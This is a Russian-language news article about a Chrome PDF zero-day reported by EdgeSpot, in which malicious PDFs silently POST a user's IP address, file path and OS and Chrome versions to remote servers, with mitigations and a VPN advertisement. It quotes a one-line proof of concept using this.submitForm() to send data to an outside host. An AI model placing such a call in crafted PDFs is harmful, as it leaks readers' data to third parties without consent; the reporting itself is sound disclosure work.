Служба обнаружения эксплойтов EdgeSpot обнаружила интригующую уязвимость Chrome нулевого дня, использующую документы PDF . Уязвимость позволяет злоумышленникам собирать конфиденциальные данные, используя вредоносные документы PDF, открытые в Chrome.

Как только жертва открывает соответствующие файлы PDF в Google Chrome, вредоносная программа начинает работать в фоновом режиме, собирая пользовательские данные .

Затем данные передаются на удаленный сервер, который контролируется хакерами. Вам может быть интересно узнать, какие данные высасываются злоумышленниками, они нацелены на следующие данные на вашем ПК:

• айпи адрес
• Полный путь к файлу PDF в системе
• Версии для ОС и Chrome

Остерегайтесь вредоносных PDF-файлов

Вы можете быть удивлены, узнав, что ничего не происходит, когда Adobe Reader используется для открытия PDF-файлов . Кроме того, HTTP POST-запросы используются для передачи данных на удаленные серверы без какого-либо вмешательства пользователя.

Эксперты заметили, что один из двух доменов readnotify [.] Com или burpcollaborator [.] Net получает данные.

Вы можете представить себе интенсивность атаки, если учесть тот факт, что большинство антивирусных программ не может обнаружить образцы, обнаруженные EdgeSpot.

Эксперты выясняют, что злоумышленники используют API-интерфейс «this.submitForm ()» PDF Javascript для сбора конфиденциальной информации пользователей.

Мы протестировали его с минимальным PoC, простой вызов API, такой как «this.submitForm (‘http://google.com/test’)», заставит Google Chrome отправлять личные данные на google.com.

Эксперты фактически обнаружили, что эта ошибка Chrome использовалась двумя различными наборами вредоносных PDF-файлов. Оба они были распространены в октябре 2017 года и сентябре 2018 года соответственно.

В частности, собранные данные могут быть использованы злоумышленниками для точной настройки атак в будущем. Отчеты предполагают, что первая партия файлов была скомпилирована с использованием службы отслеживания PDF ReadNotify.

Пользователи могут использовать сервис для отслеживания просмотров пользователей. EdgeSpot не поделился какими-либо подробностями относительно характера второго набора файлов PDF.

Как оставаться защищенным

---

Если вы хотите быть в безопасности во время серфинга в интернете, вам понадобится специальный инструмент для защиты вашей сети. Установите сейчас Cyberghost VPN и защитите себя. Он защищает ваш компьютер от атак во время просмотра, маскирует ваш IP-адрес и блокирует любой нежелательный доступ.

---

Служба обнаружения эксплойтов EdgeSpot хотела предупредить пользователей Chrome о потенциальных рисках, поскольку ожидается, что исправление не будет выпущено в ближайшем будущем.

EdgeSpot сообщил Google об этой уязвимости в прошлом году, и компания пообещала выпустить патч в конце апреля. ЧАС

тем не менее, вы можете использовать временное решение проблемы, локально просматривая полученные документы PDF с помощью альтернативного приложения для чтения PDF.

Кроме того, вы также можете открыть свои документы PDF в Chrome, отключив свои системы от Интернета. Между тем, вы можете дождаться обновления Chrome 74, которое ожидается 23 апреля.

СВЯЗАННЫЕ СТАТЬИ, КОТОРЫЕ ВЫ ДОЛЖНЫ ПРОВЕРИТЬ:

• Microsoft пропускает скриншоты браузера Edge на основе Chromium
• Теперь вы можете включить поддержку смешанной реальности Windows в Chrome
• Программа Microsoft AccountGuard по кибербезопасности выходит на новые рынки